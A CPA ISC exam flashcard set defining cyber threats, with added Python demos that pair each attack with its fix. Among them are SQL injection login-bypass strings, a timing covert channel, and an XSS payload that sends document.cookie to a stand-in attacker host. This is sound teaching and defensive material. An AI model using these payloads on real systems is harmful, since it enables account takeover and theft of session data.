CPA ISC S3 EXAM QUESTIONS WITH
COMPLETE ANSWERS
Insiders - ANSWER-employees or other trusted parties who either developed malicious
intentions over time or intentionally infiltrated an organization to achieve nefarious
objectives
External Threats - ANSWER-Threats that originate outside an organization
Network Based Attack - ANSWER-an attack that targets the infrastructure of a network,
including switches, routers, servers, and cabling, with the intent to gain unauthorized
access or disrupt operations for users
Backdoors/Trapdoors - ANSWER-methods of bypassing normal security access procedures
through an undocumented entry (and exit) point into a system or network
Covert Channel - ANSWER-mechanisms used to transmit data using methods not
originally intended for data transmission by the system designers. They violate the
entity's security policy without exceeding the user's access authorization, so they can
leak data in small parts that are hard to notice (example given: skimming $0.005 from
each of 100 million transactions by re-routing the fractions into a personal bank account)
Storage Channel - ANSWER-a covert channel in which data is transmitted by modifying a
shared storage location (such as a file name, attribute, or lock) that another party with
lower security clearance is allowed to read
Timing Channel - ANSWER-a covert channel in which the delay or gap between transmitted
packets or operations is varied to encode the hidden data, so the message rides on
timing rather than on content
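Added example, not part of the study set: a binary timing channel, with the sender encoding each bit as a short or long gap between packets, the receiver decoding from inter-arrival times alone, and a defender-side heuristic that flags a flow whose gaps collapse into two tight clusters. The gap values, the secret, and the "normal traffic" timings are assumptions constructed for the demonstration.

```python
from collections import Counter

# Added example, not part of the study set. Gap values are assumptions chosen
# for illustration; real channels use whatever spacing the network tolerates.
SHORT_GAP = 0.010   # seconds between packets that encodes a 0 bit
LONG_GAP = 0.050    # seconds between packets that encodes a 1 bit
THRESHOLD = (SHORT_GAP + LONG_GAP) / 2   # receiver's decision boundary


def encode_timing(secret: bytes, start: float = 0.0) -> list:
    """Sender side: return packet send times that carry `secret` only in their spacing.

    The packets themselves can be innocuous (e.g. valid keep-alives); every
    inter-packet gap is one bit, most significant bit of each byte first.
    """
    times = [start]
    for byte in secret:
        for shift in range(7, -1, -1):
            bit = (byte >> shift) & 1
            times.append(times[-1] + (LONG_GAP if bit else SHORT_GAP))
    return times


def decode_timing(times: list) -> bytes:
    """Receiver side: rebuild the secret from inter-arrival gaps, ignoring payloads."""
    bits = [1 if (later - earlier) > THRESHOLD else 0
            for earlier, later in zip(times, times[1:])]
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def looks_like_timing_channel(times: list, min_packets: int = 16, grid: float = 0.005) -> bool:
    """Defender heuristic: a flow whose gaps collapse into two tight clusters is suspicious.

    Normal application traffic has widely varying inter-arrival times; a binary
    timing channel produces (almost) exactly two gap values. Gaps are quantised
    to `grid` seconds and the two most common buckets must hold >= 90% of them.
    """
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    if len(gaps) < min_packets:
        return False
    buckets = Counter(round(gap / grid) for gap in gaps)
    top_two = sum(count for _, count in buckets.most_common(2))
    return top_two / len(gaps) >= 0.9


def normal_flow_times(n_packets: int = 21) -> list:
    """Constructed stand-in for ordinary traffic: deterministic but irregular gaps."""
    times = [0.0]
    for i in range(n_packets - 1):
        times.append(times[-1] + 0.005 + 0.003 * ((7 * i) % 11))
    return times


if __name__ == "__main__":
    sent = encode_timing(b"PIN:4321")
    print(decode_timing(sent))                             # b'PIN:4321'
    print(looks_like_timing_channel(sent))                 # True
    print(looks_like_timing_channel(normal_flow_times()))  # False
```

The detector is deliberately simple: real channels add jitter to blur the two clusters, and real traffic (periodic heartbeats, for instance) can also produce regular gaps, so in practice this heuristic is a triage signal to be combined with who is talking to whom, not a verdict on its own.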
Buffer Overflows - ANSWER-writing more data into a buffer than its assigned memory
space can hold, so the excess overwrites adjacent memory; attackers use this to insert
malicious code or to alter control data (such as a return address or a privilege flag)
and hijack execution.
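Added example, not part of the study set: a buffer overflow modelled on a flat byte array so that it runs safely in Python. The memory layout (a 16-byte username buffer directly in front of a 4-byte `is_admin` flag), the unchecked and checked copy routines, and the attacker payload are all assumptions constructed to show how excess input lands on the neighbouring field.

```python
# Added example, not part of the study set. The memory layout below is an
# assumption made for illustration: a 16-byte username buffer sits directly in
# front of a 4-byte `is_admin` flag, as a C struct or stack frame might place them.
BUF_OFF, BUF_LEN = 0, 16          # username buffer occupies bytes 0..15
FLAG_OFF, FLAG_LEN = 16, 4        # is_admin flag occupies bytes 16..19
FRAME_LEN = BUF_LEN + FLAG_LEN


def fresh_frame() -> bytearray:
    """A zeroed frame: empty username, is_admin == 0."""
    return bytearray(FRAME_LEN)


def is_admin(mem: bytearray) -> bool:
    return int.from_bytes(mem[FLAG_OFF:FLAG_OFF + FLAG_LEN], "little") != 0


def copy_unchecked(mem: bytearray, data: bytes) -> None:
    """Vulnerable: copies every input byte, like C strcpy/gets, never consulting BUF_LEN.

    Bytes 16..19 of a long input land on the flag. Writing past the frame raises
    IndexError here, which plays the role of the segfault a real program would hit.
    """
    for i, byte in enumerate(data):
        mem[BUF_OFF + i] = byte


def copy_checked(mem: bytearray, data: bytes) -> None:
    """Hardened: the destination size is the bound, and oversized input is rejected."""
    if len(data) > BUF_LEN:
        raise ValueError(f"input is {len(data)} bytes, buffer holds {BUF_LEN}")
    mem[BUF_OFF:BUF_OFF + len(data)] = data


def login_attempt(copier, username: bytes) -> str:
    """Simulated login: the role is decided solely by the flag that sits after the buffer."""
    frame = fresh_frame()
    try:
        copier(frame, username)
    except (ValueError, IndexError):
        return "rejected"
    return "admin" if is_admin(frame) else "user"


# Attacker input: fill the 16-byte buffer, then overwrite is_admin with 1.
OVERFLOW_PAYLOAD = b"A" * BUF_LEN + (1).to_bytes(FLAG_LEN, "little")

if __name__ == "__main__":
    print(login_attempt(copy_unchecked, b"alice"))            # user
    print(login_attempt(copy_unchecked, OVERFLOW_PAYLOAD))    # admin  (privilege escalation)
    print(login_attempt(copy_checked, OVERFLOW_PAYLOAD))      # rejected
```

The point of the checked version is that the bound comes from the destination, not from the input: the copy routine knows how large the buffer is and refuses anything longer, which is the same discipline behind using length-bounded copies (and compiler or runtime bounds checks) in native code.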
Denial of Service (DoS) - ANSWER-one or more attackers flood a server with so many
incoming requests that it is unable to handle legitimate business
Distributed Denial of Service (DDoS) - ANSWER-a DoS launched from multiple machines
(typically compromised systems under the attacker's control) that attack the server
simultaneously to force it offline
Man-in-the-middle (MITM) attack - ANSWER-an attacker positions themselves as an
intermediary between two parties, intercepting (and possibly altering) their
communications while appearing to each side as the legitimate counterpart in what
looks like a normal secure session
Port-Scanning Attack - ANSWER-attackers scan a network's hosts for open ports to
identify listening services and vulnerabilities that can be exploited to gain
unauthorized access to a company's network
Ransomware Attack - ANSWER-malware that locks a user's or a company's operating
systems, applications, and data (typically by encrypting them) and denies access
unless a ransom is paid
Reverse Shell Attacks - ANSWER-the victim's machine initiates an outbound connection
to the attacker from behind the company firewall; because outbound traffic is usually
permitted, the attacker bypasses the firewall and other safeguards and remotely
controls the victim's machine
Replay Attacks - ANSWER-a cybercriminal eavesdrops on a secure network
communication, captures a legitimate message, and re-sends (replays) it later to the
intended target to gain access to the network and the data behind the firewall,
without needing to decrypt or forge the message
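Added example, not part of the study set: a signed transfer request replayed against two servers. The naive server checks only the HMAC, so the captured packet is accepted twice; the hardened server also requires a fresh timestamp and a never-before-seen nonce. The shared key, account names, amounts and timestamps are constructed for the demonstration, and the clock is injectable so the exchange is deterministic.

```python
import hashlib
import hmac
import json
import secrets
import time

# Added example, not part of the study set. Key, account names and timestamps
# are constructed for the demonstration.
SHARED_KEY = b"demo-shared-key-do-not-reuse"


def sign(message: dict, key: bytes = SHARED_KEY) -> dict:
    """Client side: serialise the message and attach an HMAC-SHA256 tag."""
    body = json.dumps(message, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return {"body": body, "mac": tag}


def mac_is_valid(packet: dict, key: bytes = SHARED_KEY) -> bool:
    expected = hmac.new(key, packet["body"], hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, packet["mac"])


def make_transfer(to: str, amount: int, ts: float, nonce: str = None) -> dict:
    """Build a signed transfer request carrying a timestamp and a one-time nonce."""
    return sign({"to": to, "amount": amount, "ts": ts,
                 "nonce": nonce or secrets.token_hex(16)})


class NaiveServer:
    """Vulnerable: a correct MAC is the only check, so a captured packet can be
    re-sent verbatim and the transfer happens twice."""

    def __init__(self):
        self.ledger = []

    def handle(self, packet: dict) -> str:
        if not mac_is_valid(packet):
            return "rejected: bad mac"
        self.ledger.append(json.loads(packet["body"]))
        return "accepted"


class HardenedServer(NaiveServer):
    """Adds freshness checks: the timestamp must be within `window` seconds and the
    nonce must never have been seen before. `now` is injectable for testing."""

    def __init__(self, window: float = 30.0, now=time.time):
        super().__init__()
        self.window = window
        self.now = now
        self.seen_nonces = set()   # in production: bounded to the window, e.g. a TTL cache

    def handle(self, packet: dict) -> str:
        if not mac_is_valid(packet):
            return "rejected: bad mac"
        msg = json.loads(packet["body"])
        if abs(self.now() - msg["ts"]) > self.window:
            return "rejected: stale"
        if msg["nonce"] in self.seen_nonces:
            return "rejected: replay"
        self.seen_nonces.add(msg["nonce"])
        self.ledger.append(msg)
        return "accepted"


def run_exchange(server) -> tuple:
    """Legitimate client sends one transfer; an eavesdropper re-sends the identical
    packet a few seconds later. Returns the server's two verdicts and ledger size."""
    packet = make_transfer("acct-4711", 500, ts=1000.0)
    verdicts = [server.handle(packet)]          # original request
    verdicts.append(server.handle(packet))      # replayed capture, bit-for-bit identical
    return verdicts, len(server.ledger)


if __name__ == "__main__":
    print(run_exchange(NaiveServer()))                         # (['accepted', 'accepted'], 2)
    print(run_exchange(HardenedServer(now=lambda: 1005.0)))    # (['accepted', 'rejected: replay'], 1)
```

Note what the MAC does and does not buy: it stops the eavesdropper from altering the amount (any change breaks the tag), but it says nothing about whether the message is new. Freshness has to be part of the signed content, which is why the timestamp and nonce are inside the body rather than added alongside it, and why the nonce store only needs to remember values for as long as the timestamp window keeps them acceptable.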
Return Oriented Attacks - ANSWER-return-oriented programming (ROP): a sophisticated
technique that chains small pieces of legitimate code already present in the system
(gadgets that each end in a return instruction) in a sequence that performs operations
useful to the attacker, sidestepping defenses that block injected code (like taking
pieces from a shredder and reassembling them into a new document)
Spoofing - ANSWER-the act of impersonating someone or something to obtain
unauthorized system access, by using falsified credentials or by imitating a legitimate
person/entity with a fake IP address, domain, or email address
Domain Name System (DNS) Spoofing - ANSWER-an attacker modifies the domain name to IP
address mapping provided by the Domain Name System so that users are directed to an
address the attacker controls
Hyperlink Spoofing - ANSWER-alteration of hyperlink URLs so that they redirect the
victim away from their intended destination
Address Resolution Spoofing (ARS) - ANSWER-also called ARP spoofing; the fraudulent act
of falsifying the mapping of IP addresses to media access control (MAC) addresses on a
local network (via forged ARP replies) so that traffic meant for one host is delivered
to the attacker's machine
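Added example, not part of the study set: detection logic run over a constructed sequence of ARP replies in which an attacker claims first the gateway's IP and then a workstation's. The detector raises three kinds of alert: a pinned (static) mapping answered by a different MAC, an IP whose MAC changes, and one MAC answering for several IPs. The addresses, timestamps and the static table are made up for the demonstration.

```python
from collections import defaultdict

# Added example, not part of the study set. The ARP replies below are constructed
# (timestamp in seconds, sender IP, sender MAC); the addresses are made up.
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # genuine gateway
    (1.0, "192.168.1.20", "aa:bb:cc:00:00:20"),   # genuine workstation
    (2.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),
    (3.0, "192.168.1.1",  "de:ad:be:ef:00:99"),   # attacker claims the gateway's IP
    (3.5, "192.168.1.20", "de:ad:be:ef:00:99"),   # ...and the workstation's: traffic now flows via the attacker
    (4.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # genuine gateway answers again: mapping flaps
]

# Pinned mapping for the gateway, as an administrator might configure with a static ARP entry.
STATIC_TABLE = {"192.168.1.1": "aa:bb:cc:00:00:01"}


def detect_arp_spoofing(replies, static_table=None):
    """Return (ts, kind, subject, detail) alerts for three tell-tale patterns:
    a pinned IP answered by a different MAC, an IP whose MAC changes, and one
    MAC answering for several IPs (the posture of a man-in-the-middle)."""
    static_table = static_table or {}
    mac_for_ip = {}
    ips_for_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        if ip in static_table and static_table[ip] != mac:
            alerts.append((ts, "static-violation", ip, mac))
        previous = mac_for_ip.get(ip)
        if previous is not None and previous != mac:
            alerts.append((ts, "mapping-changed", ip, f"{previous} -> {mac}"))
        mac_for_ip[ip] = mac
        if ip not in ips_for_mac[mac]:
            ips_for_mac[mac].add(ip)
            if len(ips_for_mac[mac]) > 1:
                alerts.append((ts, "mac-claims-multiple-ips", mac, sorted(ips_for_mac[mac])))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, STATIC_TABLE):
        print(alert)
```

A legitimate NIC replacement also produces a single "mapping-changed" alert, so the strongest signals are the static-table violation and the flapping that follows when the real host keeps answering; on managed switches the same idea is enforced in hardware by dynamic ARP inspection, which drops replies that contradict the DHCP binding table.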
Application Based Attacks - ANSWER-attacks that target specific software or
applications, such as databases or websites, to gain unauthorized access or disrupt
functionality
Structured Query Language (SQL) Injection - ANSWER-a type of attack in which the
hacker adds SQL code to a web or application input that is concatenated into a query,
to gain access to or alter data in the database; the target in this attack is the database
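Added example, not part of the study set: a login query built by string formatting beside its parameterized form, run against an in-memory SQLite database. Two constructed attacker inputs are tried: one comments out the password check to log in as admin, the other appends an always-true condition. The users, roles and (deliberately plaintext, demo-only) passwords are constructed.

```python
import sqlite3

# Added example, not part of the study set. Users and (plaintext, demo-only)
# passwords are constructed; a real system stores password hashes.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse battery", "user"),
        ("admin", "s3cret!", "admin"),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the query by string formatting, so user input becomes SQL."""
    query = ("SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_parameterized(conn, username: str, password: str):
    """Hardened: placeholders keep input as data; the query text never changes."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Constructed attacker inputs.
# In the username field, `--` starts an SQL comment and discards the password check.
BYPASS_ADMIN = "admin' --"
# In the password field, OR adds an always-true condition so any row matches.
BYPASS_ANY_PASSWORD = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, BYPASS_ADMIN, "wrong"))           # ('admin', 'admin')
    print(login_vulnerable(conn, "nobody", BYPASS_ANY_PASSWORD))   # ('alice', 'user')  first row matches
    print(login_parameterized(conn, BYPASS_ADMIN, "wrong"))        # None
```

The parameterized version is not filtering anything: the driver sends the query text and the values separately, so a quote or comment marker in the input can only ever be compared against a column, never parsed as SQL. Input validation and least-privilege database accounts are worth adding on top, but placeholders are the control that removes the flaw.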
Cross Site Scripting (XSS) - ANSWER-injecting script code into a company's website so
that it executes in the browsers of users visiting the site; the target in this attack is the
website's users, whose data (such as session cookies) is compromised through the
company's website
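Added example, not part of the study set: a reflected XSS in two output contexts (HTML body and a quoted attribute), each shown unescaped beside its escaped form using Python's standard `html.escape`. The payloads and the attacker host `attacker.example` are constructed for the demonstration.

```python
import html

# Added example, not part of the study set. Payloads and the attacker host are
# constructed; attacker.example is a hypothetical collection endpoint.


# Reflected XSS: the page echoes the search term into HTML body context.
def render_search_vulnerable(query: str) -> str:
    return f"<p>Results for: {query}</p>"


def render_search_escaped(query: str) -> str:
    """Hardened: escape for HTML body context, so < > & " ' cannot open markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# Same flaw in attribute context: breaking out of the quoted value adds an event handler.
def render_input_vulnerable(query: str) -> str:
    return f'<input name="q" value="{query}">'


def render_input_escaped(query: str) -> str:
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


BODY_PAYLOAD = '<script>fetch("https://attacker.example/c?" + document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)" x="'

if __name__ == "__main__":
    print(render_search_vulnerable(BODY_PAYLOAD))   # script tag reaches every visitor's browser
    print(render_search_escaped(BODY_PAYLOAD))      # &lt;script&gt;... shown as text, not executed
    print(render_input_vulnerable(ATTR_PAYLOAD))    # onfocus handler injected into the tag
    print(render_input_escaped(ATTR_PAYLOAD))       # &quot; keeps the value inside the attribute
```

Escaping is context-specific: the same `html.escape` is right for body text and quoted attributes, but a value placed inside a `<script>` block or a URL needs that context's encoding instead, and a value written into an unquoted attribute cannot be made safe by escaping at all. Templating engines that escape by default, plus a Content Security Policy that blocks inline scripts, cover the cases a hand-written escape call misses.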
Race Condition - ANSWER-an attacker exploits a system or application that relies on a
specific sequence of operations, forcing two or more operations to occur out of order or
to interleave (for example, acting on a check after the condition it checked has already
changed)
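Added example, not part of the study set: a check-then-act race on an account withdrawal. The vulnerable method takes an `interleave` hook that stands in for a scheduler switch between the balance check and the debit, so a second withdrawal slips through and the balance goes negative; the hardened method holds a lock across both steps, shown under real threads. The account, amounts and hook are constructed for the demonstration.

```python
import threading

# Added example, not part of the study set. The account, amounts and the
# `interleave` hook (which stands in for a scheduler switch) are constructed.


class Account:
    def __init__(self, balance: int):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw_unsafe(self, amount: int, interleave=None) -> bool:
        """Vulnerable check-then-act: another request can run between the two steps."""
        if self.balance >= amount:            # step 1: check
            if interleave is not None:
                interleave()                  # a second request runs here (scheduler switch)
            self.balance -= amount            # step 2: act, on a check that is now stale
            return True
        return False

    def withdraw_safe(self, amount: int) -> bool:
        """Hardened: check and act form one critical section under a lock."""
        with self._lock:
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False


def double_spend_demo() -> tuple:
    """Two withdrawals of the full balance both pass the check; balance goes negative."""
    acct = Account(100)
    second_request = lambda: acct.withdraw_unsafe(100)
    first = acct.withdraw_unsafe(100, interleave=second_request)
    return first, acct.balance


def concurrent_withdrawals(balance: int, amount: int, n_threads: int) -> tuple:
    """Run `n_threads` real threads against withdraw_safe; return sorted verdicts and balance."""
    acct = Account(balance)
    results = []
    gate = threading.Barrier(n_threads)   # release all threads at once to maximise contention

    def worker():
        gate.wait()
        results.append(acct.withdraw_safe(amount))

    threads = [threading.Thread(target=worker) for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sorted(results), acct.balance


if __name__ == "__main__":
    print(double_spend_demo())                   # (True, -100)
    print(concurrent_withdrawals(100, 100, 2))   # ([False, True], 0)
```

The same pattern appears wherever a decision and the action it authorises are separate steps: a file permission check followed by an open, a coupon "is unused" check followed by redemption, a quota check followed by an allocation. The fix is always to make the pair atomic, with a lock as here or with a single conditional update in the database.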